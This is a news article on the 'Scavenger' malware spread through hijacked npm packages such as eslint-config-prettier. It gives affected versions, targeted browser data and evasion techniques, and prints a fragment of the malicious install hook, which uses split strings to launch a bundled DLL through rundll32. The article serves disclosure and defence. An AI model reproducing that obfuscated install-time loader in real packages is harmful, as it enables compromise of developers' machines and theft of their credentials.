Scavenger Malware Hijacks Popular npm Packages to Attack Developers

A sophisticated supply chain attack targeting JavaScript developers emerged on Friday, July 18th, 2025, when cybercriminals compromised multiple popular npm packages to distribute the newly identified “Scavenger” malware.

The attack primarily focused on eslint-config-prettier, a widely-used code formatting package, along with several other development tools including eslint-plugin-prettier, snyckit, @pkgr/core, and napi-postinstall.

The compromise was discovered when GitHub users reported suspicious releases of eslint-config-prettier that appeared in the npm registry despite no corresponding code changes being reflected in the project’s GitHub repository.

The package maintainer later confirmed their npm account had been compromised through a phishing email campaign, allowing attackers to publish malicious versions across multiple package versions including 8.10.1, 9.1.1, 10.1.6, and 10.1.7.

Humpty’s RE blog identified the malware family as “Scavenger” due to multiple references to the strings “SCVNGR” and “Scavenger” found throughout the malware variants.

The attack represents a significant escalation in supply chain threats, as it specifically targets the developer ecosystem through trusted development tools that are routinely installed in JavaScript projects worldwide.

The malware’s impact extends beyond typical information stealing, as it specifically targets Chromium-based browsers and their associated data stores, including Extensions, ServiceWorkerCache, DawnWebGPUCache, and Visited Links.

This targeting suggests the attackers are particularly interested in harvesting developer credentials, session tokens, and browsing patterns from software development professionals who commonly use these tools.

Infection Mechanism and Code Execution

The Scavenger malware employs a sophisticated infection vector through the compromised eslint-config-prettier package.

Upon installation, the malicious package executes an install.js file containing a deceptively named logDiskSpace() function that serves as the initial payload delivery mechanism.

The function includes deliberately obfuscated JavaScript code that checks for Windows systems before executing the malicious payload:-

function logDiskSpace() {
    try {
        if(os.platform() == 'win32') {
            const tempDir = os.tmpdir();
            require('chi'+'ld_pro'+'cess')["sp"+"awn"]
            ("rund"+"ll32",
            [path.join(__dirname, './node-gyp' + '.dll') +
            ",main"]);

This code fragment demonstrates the attackers’ use of string concatenation to evade static analysis tools while executing a bundled DLL file named node-gyp.dll using Windows’ rundll32.exe utility.

The malware loader, compiled on the same day as the attack (2025-07-18 08:59:38 UTC), incorporates multiple anti-analysis techniques including VM detection through SMBIOS firmware table enumeration and process space scanning for security tools like Avast, Sandboxie, and Comodo Antivirus.

The malware utilizes XXTEA block cipher encryption with a distinctive DELTA value of 0x9e3779b9 for command and control communications, establishing initial contact through base64-encoded responses from compromised infrastructure.

Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now